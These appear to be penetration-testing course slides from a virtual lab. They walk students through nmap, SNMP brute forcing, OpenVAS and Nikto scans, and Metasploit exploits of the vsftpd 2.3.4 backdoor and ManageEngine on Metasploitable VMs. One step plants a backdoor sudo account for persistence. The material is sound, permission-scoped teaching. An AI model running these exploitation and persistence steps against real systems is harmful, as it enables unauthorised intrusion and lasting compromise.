Network Security Training

Vulnerability Assessment and

Penetration Testing
Virtual Lab Environment
• Open academy.apnic.net
• Click on Virtual Labs, then make sure you’re logged in
• Find the Vulnerability Scanning and Penetration Testing Lab
• Click “Launch Lab”, it will take 1-2 min to load the new lab session
• Once started, you can resize the pop-up lab window as you see fit
• “Instructions” gives you instructions and links
• Click the green text to have it immediately typed into the active window
• “Resources” lets you access the Kali username/password

2
Virtual Lab Environment
• The lab environment is set for 3 hours of active time
• This can be extended when you see a pop-up in the bottom-right
corner
• After the timer expires, your lab will be saved at it’s last
state
• You can re-open your lab to resume where you left off
• Saved labs will be kept for 7 days

3
Penetration Testing
• Vulnerability assessment
• A methodical review of all vulnerabilities within the scoped
system/network
• The goal is a prioritised list of vulnerabilities to guide the
administrators in their remediation efforts
• Usually performed when you know you have issues, as a way to
improve security
• Can be performed with credentials (host based) or non-credentialed
(network based)
• This can be seen as part of an audit

4
Penetration Testing
• Penetration test (aka pen test)
• Simulated attacks to compromise a system within the scoped
system/network
• The goal is to obtain access to what is considered the “crown jewels”
• In capture the flag (CTF) competitions, this is called the “flag”
• Used to test a mature security defenses
• On its own, a penetration test does not look for all vulnerabilities, just
the ones needed to achieve the goal
• This is what they do in movies

5
Penetration Testing
• Defining the Scope
• It’s important to define the scope to cover the breadth and depth of the
assessment
• What systems and networks are allowed to be tested? (attack surface)
• How far can the testing go from non-intrusive scanning to active
exploitation (intrusive)
• What is the goal or objective of the testing team? What flag to capture?
• Black box test – testing without prior or inside knowledge, external team
• White box test – testing with knowledge of the environment, usually an
internal team

6
Penetration Testing
• Legal issues
• When performing the actions of an attacker it’s important to stay on the
right side of the law
• There are entire codes of ethics around professional pentesters and
pentest certifications
• Stay legal in your actions, and always have permission
• Contracts (pre-test) and reports (post-test) take up the major of your time
• Black hats – no permission, illegal activity
• White hats – security professionals, operating legally and with permission
• Grey hats – sitting on the fence, performing both legal and illegal actions,
possibly reformed(?) black hats
7
Penetration Testing
• Post-Pentest Reports
• Shows dramatic proof of vulnerabilities and risks
• Document all actions taken in a reproducible form
• Detail the amount of effort required during the test, as an indication
of the level of protection employed on the systems
• Provide actionable intelligence to mitigate the vulnerabilities
exploited, and other issues discovered during the test
• A large collection of publicly available pentest reports
• github.com/juliocesarfort/public-pentesting-reports

8
Penetration Testing
• Regular security testing
• Vulnerability assessments and penetration tests are best performed
on a regular basis
• May be required for compliance, but remember most compliance is
just a minimum baseline
• Some vulnerability assessment tools can perform continuous
scanning to quickly detected changes to the environment
• New servers turned on, new applications installed, opening firewall policies
• Penetration tests are best repeated after remediation work has been
completed, as by their nature a single penetration test may not find all
vulnerabilities
9
Penetration Testing
• Attack Life Cycle

10
Security Tools and Measures
• Reiterating legal issues
• You only have permission to perform these hands-on exercises in
this specific Academy virtual lab network, 192.168.30.xxx
• Get permission before using any of these tools or techniques on
any other network, such as your work network or cloud providers

11
Security Tools and Measures
• VM information
• Kali Linux is our main attacking platform, use this by default
• Boot Kali and make sure you can log in with
Username: root
Password: toor
• Open a terminal window and run ifconfig
• You should have the address 192.168.30.101
• Also note the addresses for the Metasploitable 2 and 3
VMs as listed in the Instructions tab

12
Security Tools and Measures
• Nmap
• Network Mapper, for network discovery and auditing
• Combines port scanning, firewall detection/evasion, service version
detection, OS detection, and more
• Featured in The Matrix Reloaded, Die Hard 4, Girl With the Dragon
Tattoo, The Bourne Ultimatum, and many more
Screenshots at nmap.org/movies/

13
Security Tools and Measures
• Nmap
• nmap -sS <meta2_IP>
• Example: nmap -sS 192.168.30.102
• -sS uses a TCP SYN scan to find open ports, and doesn’t complete
the 3-way handshake. This is best used on it’s own to get fast
results and to be a little stealthy.
• Because we are not completing the 3 way handshake and not
connecting to the services fully, the nmap output will only show if
the port is open or closed.

14
Security Tools and Measures
• Nmap
• nmap -sV -O <meta2_IP>
^^ this is a capital “oh”
• -sV tests the open ports to find service and version information, but
will have to make a full connection
• -O (capital ‘oh’) enables OS detection
• nmap -sU –p 50-170 <meta2_IP>
• -sU scans UDP ports 50-170 (scanning a large range is slow)

15
Security Tools and Measures
• You can also output nmap results to an XML file using
-oX filename
• Useful for automated tools to read and interpret the results
• nmap -sV –oX nmap1.xml <meta2_IP>
• less nmap1.xml

16
Security Tools and Measures
• Use ndiff to compare scans looking for differences
• Useful to compare scans over time to find unknown/unexpected
changes, and can be scripted to run at regular intervals
• Test before and after making security changes to see the impact
• cd nmap
• ls –al
• Try comparing nmap1 against nmap2, then nmap2 against nmap3
• ndiff nmap1.xml nmap2.xml
• Discuss: What are the differences between the 2 dated files?

17
Security Tools and Measures
• SPARTA
• GUI on top of nmap
• Provides some other features like screenshotting, nikto web vulnerability
scanning, sql scanning, and staged nmap scans
• Run SPARTA: Applications > 02 - Vulnerability Analysis > sparta
• Click on the actual text “Click here to add host(s) to scope”
• Let’s scan your own Meta2 and Meta3 addresses, separated by a space
• When done, click on an IP address then click the tabs on the right

• Discuss: What interesting output do you see?

18
Security Tools and Measures
• NetBIOS and Nmap Scripts
• nmap supports a large variety of different scripts to perform tasks
beyond just port scanning
• This command uses all scripts whose names start with smb-enum*
• nmap –-script=smb-enum* –p 445 <meta3_IP>
• Try running these tools against meta2 as well (Linux running smbd)
• nmap –-script=smb-enum* -p 445 <meta2_IP>
• There’s also a group of default scripts that scan more than just
445/tcp
• nmap –-script=default <meta3_IP>
19
Security Tools and Measures
• NetBIOS
• There is also wrapper scripts which combine several tools into one
• enum4linux <meta3_IP>
• Also try against meta2

• Discuss: What interesting output do you see?

What happens if you point it to your laptop?

20
Security Tools and Measures
• SNMP Community Strings
• In Kali, look at the snmp_short_pass.txt wordlist which some tools
can use to try brute force attacking the SNMP community string
• cd /usr/share/metasploit-framework/data/wordlists/
• ls -al
• less snmp_short_pass.txt
• Have a look at the snmp word list, these are common community strings
• (press q to exit from the less command)
• We deleted line 33 from the snmp_default_pass.txt file because it was
too long (a bug in the tool we use on the next slide)

21
Security Tools and Measures
• onesixtyone
• onesixtyone -c snmp_short_pass.txt 127.0.0.1
• Do you see where the default community string is displayed?

• ./change_snmpd.sh
• This changes the SNMP community string to something harder,
then run the above onesixtyone command again to crack the new
“password” (community string)
• If you run ./change_snmp.sh again, it will change it back to the easy one

22
Security Tools and Measures
• SNMP enumeration tools
• snmp-check -c pr1v4t3 127.0.0.1
• snmpwalk -c pr1v4t3 -v1 127.0.0.1

127.0.0.1 [pr1v4t3] Linux kali 4.12.0-kali2-amd64

• Whatever password you found using onesixtyone, use

that here to access the SNMP server. So if it was still
“public” then you would use “public” in snmp-check and
snmpwalk
23
Security Tools and Measures
• OpenVAS
• In the beginning (1998), there was Nessus, an open source security
and vulnerability scanner
• In 2005, Nessus 3 was changed to closed source and sold under
the new Tenable Network Security company
• Nessus 2 was still open source and was forked into OpenVAS,
Open Vulnerability Assessment System
• OpenVAS uses community created/maintained Network
Vulnerability Tests (NVTs)

24
Security Tools and Measures
• OpenVAS
• WebUI created by Greenbone
• Start the OpenVAS services: openvas-start
• Open Firefox browser and go to https://127.0.0.1:9392
• Username = admin
• Password = password

• Exercise: Schedule a scan an immediate scan (and wait)

• Exercise: Review pre-made reports, and deltas/differences

25
Security Tools and Measures
• Nikto
• Nikto is a web server scanning tool to find server misconfigurations,
dangerous files, old server versions, and other vulnerabilities
• https://cirt.net/Nikto2
• Lets do a benchmark scan against the default Apache install on Kali
nikto -host 127.0.0.1 -ask no -output ~/nikto.txt
• Discuss: What do you see in the output?
This is a tilde symbol ~
26
Security Tools and Measures
• Metasploit
• Penetration testing software,
• Used to find, exploit, and validate vulnerabilities
• Metasploit Framework is an open source project
• Commercial versions are maintained and sold by Rapid7 and focus
on web interface, automation, as streamlining common tasks

27
Security Tools and Measures
• Metasploit – Meta2 Linux exercise
• First, let’s use nmap to scan the Meta2 Linux VM
• nmap -sV <meta2 _IP>
• Let’s look at the first one on the list, FTP server: vsftpd 2.3.4
• Run Metasploit
• Applications > 08 – Exploitation Tools > Metasploit
• Alternatively, you can just run msfconsole from a terminal window
• You should see a new terminal window with the prompt: msf >
• help

28
Security Tools and Measures
• This console uses tab completion to make typing easier
• search vsftpd
Matching Modules

================

Name Disclosure Date Rank Description

---- --------------- ---- -----------

exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent VSFTPD v2.3.4

Backdoor Command Execution

• use exploit/unix/ftp/vsftpd_234_backdoor
• info
29
Security Tools and Measures
• show options
• set RHOST <meta2_IP>
• show payloads
• set PAYLOAD cmd/unix/interact
• run
• or you can type exploit if that makes you feel more like a hacker
• It won’t show a prompt, but try typing ifconfig and whoami and ls
Congrats, you just hacked a root shell on a remote server!
• More guides at
www.hackingtutorials.org/metasploit-tutorials/metasploit-commands/
30
Security Tools and Measures
• Now let’s make sure we can get back into this server later
• useradd –s /bin/bash notahacker
• passwd notahacker
• echo "notahacker ALL=(ALL) ALL" >> /etc/sudoers
• Open a new terminal on Kali, and SSH to Meta2 using notahacker
• ssh –l notahacker <meta2_IP>
• nmap <meta3_IP>

31
Security Tools and Measures
• Metasploit – Meta3 Windows exercise
• First, let’s use nmap to scan the Meta3 Windows VM
• nmap -sV <Meta3 _IP>
• Connect to port 8383 in a browser: https://<Meta3_IP >:8383
• ManageEngine… didn’t it have really bad vulnerability a few years ago?
• Of course in the real world you wouldn’t know or remember this, but with web
search tools it’s not overly difficult to search for known vulnerabilities in
applications and specific versions.
• Run Metasploit
• If you still have Metasploit open from the previous exercise, just type back
• Otherwise: Applications > 08 – Exploitation Tools > Metasploit

32
Security Tools and Measures
• search manageengine
• Look for exploit/windows/http/manageengine_connectionid_write which has a
rank of “excellent”
• use exploit/windows/http/manageengine_connectionid_write
• info
• show options
• set RHOST <Meta3_IP>
• set RPORT 8383
• set SSL true
• run
• Now run Windows commands like ipconfig , pwd and dir
• Congrats, you just hacked a Windows remote shell that has
NT AUTHORITY\LOCAL SERVICE privileges
33
Security Tools and Measures
• Metasploit – SSH version detection
• This shows you the different features of Metasploit framework
• Run Metasploit
• Applications > 08 – Exploitation Tools > Metasploit
• search ssh_version
• use auxiliary/scanner/ssh/ssh_version
• info
• show options
• set RHOSTS <Meta2_IPs>
• set THREADS 100
• not necessary for this scan, but will help when scanning of many hosts
• run
34